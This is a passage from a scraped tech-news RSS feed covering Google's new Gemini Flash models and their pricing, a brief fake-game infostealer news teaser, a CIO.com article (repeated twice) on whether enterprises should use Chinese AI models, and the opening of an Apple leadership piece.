href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$1.00</p></td><td><p>$6.00</p></td><td><p>$7.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Grok 4.5</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://docs.x.ai/developers/models">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>Gemini 3.6 Flash</b></p></td><td><p><b>$1.50</b></p></td><td><p><b>$7.50</b></p></td><td><p><b>$9.00</b></p></td><td><p><b></b><a href="https://ai.google.dev/gemini-api/docs/pricing"><b>Google</b></a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Kimi K3</p></td><td><p>$3.00</p></td><td><p>$15.00</p></td><td><p>$18.00</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k3">Moonshot AI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr></tbody></table><p>No price was provided yet for the specialty Gemini 3.5 Flash Cyber model, which, as its name would imply, is designed for cybersecurity researchers and red teamers to patch bugs. </p><p>While the prices are among the middle-low end of all major AI models globally, the fact that Google designed them to use less tokens overall also should drive down costs for enterprises beyond what the sticker price shows (since you'll be paying for fewer total tokens at any rate). </p><p>Gemini 3.6 Flash and Gemini 3.5 Flash-Lite are available immediately through the Gemini API in Google AI Studio and Android Studio, as well as within the consumer Gemini application and Google Search. According to a <a href="https://deepmind.google/blog/introducing-gemini-3-5-flash-cyber/">separate Google blog post</a>, Gemini 3.5 Flash Cyber will be available "exclusively available to governments and trusted partners via CodeMender soon" — <a href="https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/">CodeMender</a> being Google's proprietary AI code bug-fixing agent released last year. </p><p>As with previous Gemini models, these are all proprietary and "closed source," thus, they can only be obtained through Google's official API and that of its partners, as opposed to an open-source license like MIT or Apache 2.0. </p><p>One conspicuous omission noted by developers on X and social media: where is the larger, more powerful, flagship Gemini 3.5 Pro model Google previously alluded would be released this summer? After all, Gemini 3.1 Pro, the prior flagship, <a href="https://venturebeat.com/technology/google-launches-gemini-3-1-pro-retaking-ai-crown-with-2x-reasoning">debuted back in February 2026</a>, and rivals OpenAI and Anthropic have since released several more generations of flagship updates far more powerful than Google's. </p><p>Google technical staffer Logan Kilpatrick <a href="https://x.com/OfficialLoganK/status/2079592006163349538">responded to one such inquiry on X, writing</a>: "Gemini 3.5 Pro is currently testing with partners and we plan to make it broadly available as soon as it’s ready." </p><p>Google's release signals that the immediate future of AI lies in agentic capabilities—systems that operate autonomously over extended periods. </p><p>If early large language models are akin to massive, fuel-hungry freight trains capable of hauling incredible loads at immense cost, the new Flash series represents a fleet of nimble, hyper-efficient hybrid delivery vans.</p><h2><b>Efficiency gains ranging from 17% to 65% reduced tokens for strong results on third-party benchmarks</b></h2><p>Under the hood, Gemini 3.6 Flash achieves significant efficiency gains. The model reduces output token usage by 17% compared to its predecessor, Gemini 3.5 Flash, according to the <a href="https://x.com/ArtificialAnlys/status/2079596244339707956">Artificial Analysis Index</a> maintained by the independent third-party AI benchmarking group of the same name. </p><p>In specific long-horizon software engineering benchmarks like <a href="https://deepswe.datacurve.ai/">DeepSWE</a>, which measures how well agents complete multi-step engineering tasks from scratch, the token savings reach up to 65%. </p><p>This reduction means the model requires fewer reasoning steps and tool calls to complete the exact same multi-step workflow. Think of token efficiency like fuel economy in a vehicle. </p><p>When an AI model takes a convoluted path to solve a problem, it burns through more computational fuel, driving up the final cost for the developer. By streamlining its internal logic, Gemini 3.6 Flash arrives at the correct answer faster and cheaper.</p><p>While Google's materials did not specify the exact architectural or algorithmic changes used to achieve this token efficiency, they noted that the model "takes fewer reasoning steps and tool calls to accomplish multi-step workflows" and exhibits reduced "verbosity."</p><p>The official model cards released by Google reveal that both <a href="https://storage.googleapis.com/deepmind-media/Model-Cards/Gemini-3-6-Flash-Model-Card.pdf">Gemini 3.6 Flash</a> and <a href="https://storage.googleapis.com/deepmind-media/Model-Cards/Gemini-3-5-Flash-Lite-Model-Card.pdf">Gemini 3.5 Flash-Lite</a> feature a 1-million-token input context window alongside a max output limit of 64,000 tokens, with both models sharing a knowledge cutoff date of March 2026.</p><h2><b>Respectable benchmark performance at low cost</b></h2><p>The technological improvements extend to concrete capabilities. Gemini 3.6 Flash scores 49% on the DeepSWE benchmark, a notable increase from the 37% achieved by version 3.5. </p><p>It also pushes machine learning engineering performance higher, scoring 63.9% on MLE-Bench compared to 49.7% previously. Furthermore, Google integrates computer use as a built-in client-side tool via the Gemini API and Gemini Enterprise, reflecting an OSWorld-Verified score of 83.0%, up from 78.4%. </p><p>The model also tackles knowledge work with greater proficiency, outperforming its predecessor on benchmarks like GDPval-AA v2 by moving from a score of 1349 to 1421.</p><p>To ensure safety amidst these capability upgrades, Google deploys enhanced Frontier Safety safeguards. These protections harden the model against jailbreaks and mitigate risks in Chemical, Biological, Radiological, and Nuclear domains, as well as cyber offense misuses. </p><p>The engineering team trains the model to minimize refusals for beneficial uses, striking a necessary balance between strict security and practical utility.</p><h2>M<b>odels for low-cost coding, agentic, and cybersecurity use cases — respectively</b></h2><p>Google divided its new offerings into three distinct products tailored for different operational needs. </p><p>Gemini 3.6 Flash serves as the heavy-duty workhorse of the trio. It handles complex coding, intricate knowledge work, and multimodal processing with improved precision. Enterprise customers utilize it for demanding tasks such as complex document parsing, intricate chart and data analysis, and long-form report drafting. The model executes complex code migrations using multi-agent orchestration frameworks with lower latency and higher quality than earlier iterations. Furthermore, 3.6 Flash aids in developing photographic texture extractors for 3D workflows using canvas interfaces.</p><p>Gemini 3.5 Flash-Lite targets environments where high throughput and absolute minimal latency are non-negotiable. Google designates it as the fastest model in the 3.5 series. </p><p>As measured by Artificial Analysis, the model processes 350 output tokens per second, making it highly effective for agentic search and massive document processing workloads. <a href="https://artificialanalysis.ai/articles/gemini-3-6-flash-3-5-flash-lite-halving-time">Artificial Analysis notes</a> this is about twice as fast as prior generation model Gemini 3.1 Flash-Lite.</p><p>Developers can configure 3.5 Flash-Lite to prioritize low-latency execution for high-volume tasks using minimal thinking levels, or engage higher thinking levels to process complex multi-step subagent workloads. </p><p>Despite its lite designation, it outperforms the standard Gemini 3 Flash on several key agentic and coding evaluations, including SWE-Bench Pro, where it scores 54.2% compared to 49.6%, and OSWorld-Verified, scoring 74.0% versus 65.1%. </p><p>The model extracts product features from massive datasets, generates interactive web design concepts, and scales receipt translation seamlessly.</p><p>The third product, Gemini 3.5 Flash Cyber, represents a highly specialized deployment. Google fine-tuned this model specifically to find and fix cybersecurity vulnerabilities. It integrates directly with Google's CodeMender agent. </p><p>In practice, multiple 3.5 Flash Cyber agents work concurrently to produce a single, comprehensive vulnerability report, achieving competitive performance at the frontier on the CyberGym benchmark. </p><p>Google did not specify an exact numerical cost for 3.5 Flash Cyber, stating only that it is fine-tuned "at a lower price per token than larger models.</p><h2><b>Commercial licensing only</b></h2><p>The licensing framework for the new Gemini models carries profound implications for developers and enterprise users. Google deploys Gemini 3.6 Flash and 3.5 Flash-Lite under a commercial, proprietary API model. Unlike open-source software governed by licenses such as the MIT License or the GNU General Public License, developers do not gain access to the underlying model weights, training data, or source code.</p><p>An MIT or GPL license grants users the freedom to download the codebase, modify the internal architecture, self-host the deployment, and distribute the software infrastructure independently. In contrast, Google's API approach means developers essentially rent access to the intelligence on a strict metered basis. Every prompt and generated response travels through Google's managed servers, incurring a cost based on the strict pricing structure of $1.50 per million input tokens for 3.6 Flash. </p><p>This commercial tethering restricts deployment flexibility. Enterprises cannot air-gap the models entirely on their own local secure hardware without establishing specialized, high-tier enterprise agreements with Google Cloud. Developers remain bound by Google's acceptable use policies, arbitrary rate limits, and network requirements, creating a permanent dependency on Google's infrastructure uptime and terms of service.</p><p>The licensing for Gemini 3.5 Flash Cyber proves even more restrictive. Acknowledging the dual-use nature of cybersecurity AI—which attackers can weaponize just as easily as defenders can use it to patch systems—Google is for now making the model only available behind a limited-access pilot program, similar to the trend kicked off by Anthropic's Mythos model with its Project Glasswing program, and continued by OpenAI with its staggered rollout for GPT-5.6. </p><p>In this case, Google is making 3.5 Flash Cyber exclusively available to governments and trusted partners. This strict gatekeeping prevents open access, prioritizing systemic security over widespread developer innovation.</p><h2><b>Looking ahead</b></h2><p>Google DeepMind continues to iterate rapidly, but the gap in its product line remains apparent. While the Flash series excels in speed and economy, </p><p>the industry eagerly awaits the deployment of Gemini 3.5 Pro to gauge Google's absolute frontier capabilities.</p><p>Simultaneously, the company confirms that pre-training for Gemini 4 has already commenced. </p><p>Until the next major flagship release materializes, developers must optimize their systems using the highly efficient, yet purposefully constrained, Flash architecture.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Turn Fake Games Into Multi-Stage Infostealers That Steal Passwords and Crypto Wallets]]></title>
<description><![CDATA[Criminals are using fake game downloads to slip a sophisticated information stealer onto Windows computers. The campaign hides behind supposed games, mods, cracks, and other software, exploiting the trust and urgency around free or hard-to-find downloads. A downloaded archive can appear harmless ...]]></description>
<link>https://tsecurity.de/de/3684724/it-security-nachrichten/hackers-turn-fake-games-into-multi-stage-infostealers-that-steal-passwords-and-crypto-wallets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684724/it-security-nachrichten/hackers-turn-fake-games-into-multi-stage-infostealers-that-steal-passwords-and-crypto-wallets/</guid>
<pubDate>Tue, 21 Jul 2026 21:31:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Criminals are using fake game downloads to slip a sophisticated information stealer onto Windows computers. The campaign hides behind supposed games, mods, cracks, and other software, exploiting the trust and urgency around free or hard-to-find downloads. A downloaded archive can appear harmless and may even display a loading or installation screen. Behind that screen, a […]</p>
<p>The post <a href="https://cybersecuritynews.com/hackers-fake-games-infostealers/">Hackers Turn Fake Games Into Multi-Stage Infostealers That Steal Passwords and Crypto Wallets</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The latest Chinese AI models may indeed work for enterprises, but only in a handful of specific applications]]></title>
<description><![CDATA[Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been nervous about relying on Chinese AI models. 



But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model Qwen3.8 Max and Moonshot’s 2.8-trillion-parameter model Kimi K3, ar...]]></description>
<link>https://tsecurity.de/de/3684721/ai-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684721/ai-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</guid>
<pubDate>Tue, 21 Jul 2026 21:24:16 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been <a href="https://www.cio.com/article/3816301/how-would-a-potential-ban-on-deepseek-impact-enterprises.html" target="_blank">nervous about relying on Chinese AI models</a>. </p>



<p class="wp-block-paragraph">But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model <a href="https://x.com/Alibaba_Qwen/status/2078759124914098291" target="_blank" rel="noreferrer noopener">Qwen3.8 Max</a> and Moonshot’s 2.8-trillion-parameter model <a href="https://www.kimi.com/blog/kimi-k3" target="_blank" rel="noreferrer noopener">Kimi K3</a>, are promising even more powerful performance, those IT executives are being forced to again ask if these models are worth using, even in a limited fashion.</p>



<p class="wp-block-paragraph">Former Walmart head of risk <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, now an independent cybersecurity and risk advisor, thinks they should at least take another look. </p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but neither adopt nor reject them solely because they are Chinese,” he said. “They should be assessed like any other critical technology dependency: jurisdiction, ownership, training and software provenance, licensing, data handling, hosting, security, reliability, and the ability to independently test their behavior. Geopolitical exposure is a legitimate risk factor, but it should be incorporated into technical and supply-chain diligence rather than used as a substitute for it.”</p>



<h2 class="wp-block-heading">Choose applications with care</h2>



<p class="wp-block-paragraph">He added, “Chinese models may be especially valuable for coding, multilingual processing, high-volume document analysis, research, synthetic-data generation, and privately operated security or forensic workflows, but they should be subject to task-specific testing rather than broad benchmark claims.”</p>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, agreed that the Chinese models can work well if they are only used in carefully chosen applications. </p>



<p class="wp-block-paragraph">“Although Moonshot’s K3 still trails Claude’s Fable 5 and GPT 5.6 Sol on performance and user experience, good companies that have governance and prompt guardrails will not face the instability and improvisation of [the Chinese] models,” he said. “These models will win in usage. US frontier models are leading as the best models, but Chinese models will be sufficient for high-volume, low-drama tasks that cost less for non-critical transactions.”</p>



<p class="wp-block-paragraph">On the flipside, Bellamkonda suggested a variety of areas where enterprises should avoid Chinese AI models, including “customer-facing work without a human in the loop, regulated or sensitive data, and anything where a hallucinated answer creates legal or safety exposure. That is where the reliability gap and the political-radioactivity concern both bite, and where the closed American models still earn their premium.”</p>



<p class="wp-block-paragraph">Bellamkonda said he didn’t see the differences in data reliability, mostly involving hallucination rates, as meaningful for enterprise AI strategy decisions.</p>



<p class="wp-block-paragraph">“Every open-weight model in this class can get facts wrong or make things up. That is fixable with the right setup, so it is not a reason to avoid these models,” he said. “For high-volume tasks with clear limits, you feed the model your own trusted documents to answer from, and you keep a person checking the output. That combination is safe for production. The model on its own is not.”</p>



<h2 class="wp-block-heading">Too early for enterprises to consider</h2>



<p class="wp-block-paragraph">However, not everyone agrees that the latest Chinese models have earned their place as enterprise AI decision options. </p>



<p class="wp-block-paragraph">Cybersecurity consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, focused on Chinese technology concerns when he worked for the US Justice Department as its representative in the US law enforcement Joint Liaison Group (JLG) with China. </p>



<p class="wp-block-paragraph">“It is way too early for US enterprises to seriously consider these models,” he said. “Until proven otherwise, enterprises should assume that if they use these models, they may be granting China complete access to everything they do through the models, and potentially access to their networks and employees more broadly. At this point, any pros of using such models are strongly outweighed by the potential security, confidentiality, and reliability concerns.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai, was equally emphatic that enterprise CIOs need to steer clear of these newer Chinese models. </p>



<p class="wp-block-paragraph">“Using them inhouse? Absolutely not. You simply don’t know what is planted inside of it and you don’t know what training data is put into them,” Findling said. </p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security, added that the very attractive pricing for these Chinese models may be appealing, but suggested that, despite the low cost, they’re ultimately too risky.</p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but not romantically. Parameter count is horsepower measured in a showroom, not braking distance in the rain,” he said. “The real tests are reliability on your data, the cost of a wrong answer, and whether the model behaves predictably under pressure.”</p>



<p class="wp-block-paragraph">He noted that the benchmarks on the latest open-weights models are impressive, and very close to those of the frontier lab models, which makes the cost ”incredibly seductive, especially when a team does not want to risk their data being used to train those frontier models.”</p>



<p class="wp-block-paragraph">But the Chinese models can still work in specific circumstances. “The strongest value will be in bounded, reversible and inspectable work: coding inside a sandbox, multilingual translation, document triage, data extraction and other high-volume tasks where outputs can be verified,” he said. “Cheap intelligence is valuable, but only when it is not mistaken for trustworthy judgment.”</p>



<p class="wp-block-paragraph">Wilkes added that the regulatory issues surrounding Chinese models can be especially problematic. Texas, for example, has <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">banned their usage</a>.  </p>



<h2 class="wp-block-heading">A rational choice for some workloads</h2>



<p class="wp-block-paragraph">However, <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, argued that CIOs should seriously consider these models. </p>



<p class="wp-block-paragraph">“Counterintuitively, the biggest benefit of Kimi and models like it is the lack of guardrails,” Goryunov said. “Think of it as stick shift cars in the era of automatics. If you want ease and comfort, stay with the frontiers because they have cruise control, shift the gears for you and they decide when. If you want performance and control, expand your horizons. But a stick shift assumes you know how to drive one: you bring your own governance, your own evals, your own safety layer. That’s a cost and specialized talent, which is super rare, and for the right organization it’s also the whole point.”</p>



<p class="wp-block-paragraph">Goryunov’s bottom line: “For internal, high-volume, well-harnessed workloads, [the Chinese models] have moved from ‘watch list’ to ‘rational choice.’”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199590/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The latest Chinese AI models may indeed work for enterprises, but only in a handful of specific applications]]></title>
<description><![CDATA[Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been nervous about relying on Chinese AI models. 



But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model Qwen3.8 Max and Moonshot’s 2.8-trillion-parameter model Kimi K3, ar...]]></description>
<link>https://tsecurity.de/de/3684669/it-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684669/it-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</guid>
<pubDate>Tue, 21 Jul 2026 21:03:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been <a href="https://www.cio.com/article/3816301/how-would-a-potential-ban-on-deepseek-impact-enterprises.html" target="_blank">nervous about relying on Chinese AI models</a>. </p>



<p class="wp-block-paragraph">But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model <a href="https://x.com/Alibaba_Qwen/status/2078759124914098291" target="_blank" rel="noreferrer noopener">Qwen3.8 Max</a> and Moonshot’s 2.8-trillion-parameter model <a href="https://www.kimi.com/blog/kimi-k3" target="_blank" rel="noreferrer noopener">Kimi K3</a>, are promising even more powerful performance, those IT executives are being forced to again ask if these models are worth using, even in a limited fashion.</p>



<p class="wp-block-paragraph">Former Walmart head of risk <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, now an independent cybersecurity and risk advisor, thinks they should at least take another look. </p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but neither adopt nor reject them solely because they are Chinese,” he said. “They should be assessed like any other critical technology dependency: jurisdiction, ownership, training and software provenance, licensing, data handling, hosting, security, reliability, and the ability to independently test their behavior. Geopolitical exposure is a legitimate risk factor, but it should be incorporated into technical and supply-chain diligence rather than used as a substitute for it.”</p>



<h2 class="wp-block-heading">Choose applications with care</h2>



<p class="wp-block-paragraph">He added, “Chinese models may be especially valuable for coding, multilingual processing, high-volume document analysis, research, synthetic-data generation, and privately operated security or forensic workflows, but they should be subject to task-specific testing rather than broad benchmark claims.”</p>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, agreed that the Chinese models can work well if they are only used in carefully chosen applications. </p>



<p class="wp-block-paragraph">“Although Moonshot’s K3 still trails Claude’s Fable 5 and GPT 5.6 Sol on performance and user experience, good companies that have governance and prompt guardrails will not face the instability and improvisation of [the Chinese] models,” he said. “These models will win in usage. US frontier models are leading as the best models, but Chinese models will be sufficient for high-volume, low-drama tasks that cost less for non-critical transactions.”</p>



<p class="wp-block-paragraph">On the flipside, Bellamkonda suggested a variety of areas where enterprises should avoid Chinese AI models, including “customer-facing work without a human in the loop, regulated or sensitive data, and anything where a hallucinated answer creates legal or safety exposure. That is where the reliability gap and the political-radioactivity concern both bite, and where the closed American models still earn their premium.”</p>



<p class="wp-block-paragraph">Bellamkonda said he didn’t see the differences in data reliability, mostly involving hallucination rates, as meaningful for enterprise AI strategy decisions.</p>



<p class="wp-block-paragraph">“Every open-weight model in this class can get facts wrong or make things up. That is fixable with the right setup, so it is not a reason to avoid these models,” he said. “For high-volume tasks with clear limits, you feed the model your own trusted documents to answer from, and you keep a person checking the output. That combination is safe for production. The model on its own is not.”</p>



<h2 class="wp-block-heading">Too early for enterprises to consider</h2>



<p class="wp-block-paragraph">However, not everyone agrees that the latest Chinese models have earned their place as enterprise AI decision options. </p>



<p class="wp-block-paragraph">Cybersecurity consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, focused on Chinese technology concerns when he worked for the US Justice Department as its representative in the US law enforcement Joint Liaison Group (JLG) with China. </p>



<p class="wp-block-paragraph">“It is way too early for US enterprises to seriously consider these models,” he said. “Until proven otherwise, enterprises should assume that if they use these models, they may be granting China complete access to everything they do through the models, and potentially access to their networks and employees more broadly. At this point, any pros of using such models are strongly outweighed by the potential security, confidentiality, and reliability concerns.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai, was equally emphatic that enterprise CIOs need to steer clear of these newer Chinese models. </p>



<p class="wp-block-paragraph">“Using them inhouse? Absolutely not. You simply don’t know what is planted inside of it and you don’t know what training data is put into them,” Findling said. </p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security, added that the very attractive pricing for these Chinese models may be appealing, but suggested that, despite the low cost, they’re ultimately too risky.</p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but not romantically. Parameter count is horsepower measured in a showroom, not braking distance in the rain,” he said. “The real tests are reliability on your data, the cost of a wrong answer, and whether the model behaves predictably under pressure.”</p>



<p class="wp-block-paragraph">He noted that the benchmarks on the latest open-weights models are impressive, and very close to those of the frontier lab models, which makes the cost ”incredibly seductive, especially when a team does not want to risk their data being used to train those frontier models.”</p>



<p class="wp-block-paragraph">But the Chinese models can still work in specific circumstances. “The strongest value will be in bounded, reversible and inspectable work: coding inside a sandbox, multilingual translation, document triage, data extraction and other high-volume tasks where outputs can be verified,” he said. “Cheap intelligence is valuable, but only when it is not mistaken for trustworthy judgment.”</p>



<p class="wp-block-paragraph">Wilkes added that the regulatory issues surrounding Chinese models can be especially problematic. Texas, for example, has <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">banned their usage</a>.  </p>



<h2 class="wp-block-heading">A rational choice for some workloads</h2>



<p class="wp-block-paragraph">However, <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, argued that CIOs should seriously consider these models. </p>



<p class="wp-block-paragraph">“Counterintuitively, the biggest benefit of Kimi and models like it is the lack of guardrails,” Goryunov said. “Think of it as stick shift cars in the era of automatics. If you want ease and comfort, stay with the frontiers because they have cruise control, shift the gears for you and they decide when. If you want performance and control, expand your horizons. But a stick shift assumes you know how to drive one: you bring your own governance, your own evals, your own safety layer. That’s a cost and specialized talent, which is super rare, and for the right organization it’s also the whole point.”</p>



<p class="wp-block-paragraph">Goryunov’s bottom line: “For internal, high-volume, well-harnessed workloads, [the Chinese models] have moved from ‘watch list’ to ‘rational choice.’”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple and the changing of the guard]]></title>
<description><![CDATA[As Apple gears up to anoint John Ternus the new company CEO in September (while current leader Tim Cook takes a seat on the board) the company appears to be firing on all cylinders ahead of the leadership transition. 



What’s going well



Just look at the evidence: 




Apple is building marke...]]></description>
<link>https://tsecurity.de/de/3684366/it-nachrichten/apple-and-the-changing-of-the-guard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684366/it-nachrichten/apple-and-the-changing-of-the-guard/</guid>
<pubDate>Tue, 21 Jul 2026 18:33:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As Apple gears up to <a href="https://www.computerworld.com/article/4161377/with-john-ternus-as-ceo-expect-apples-platforms-to-proliferate.html">anoint John Ternus</a> the new company CEO in September (while current leader Tim Cook <a href="https://www.apple.com/uk/newsroom/2026/04/tim-cook-to-become-apple-executive-chairman-john-ternus-to-become-apple-ceo/" target="_blank" rel="noreferrer noopener">takes a seat on the board</a>) the company appears to be firing on all cylinders ahead of the leadership transition. </p>



<h2 class="wp-block-heading"><strong>What’s going well</strong></h2>



<p class="wp-block-paragraph">Just look at the evidence: </p>



<ul class="wp-block-list">
<li>Apple is building market share across its entire product range; even memory-driven price inflation doesn’t seem to have dampened demand for its hardware yet.</li>



<li>While Apple had to raise prices, the company’s MacBook Neo remains seriously popular. It’s sitting atop <a href="https://www.amazon.com/Best-Sellers-Laptop-Computers/zgbs/electronics/565108" target="_blank" rel="noreferrer noopener">Amazon’s US best-selling chart</a>, which currently includes six Macs in the top 10. The Neo has <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html" target="_blank">topped this chart</a> since its introduction.</li>



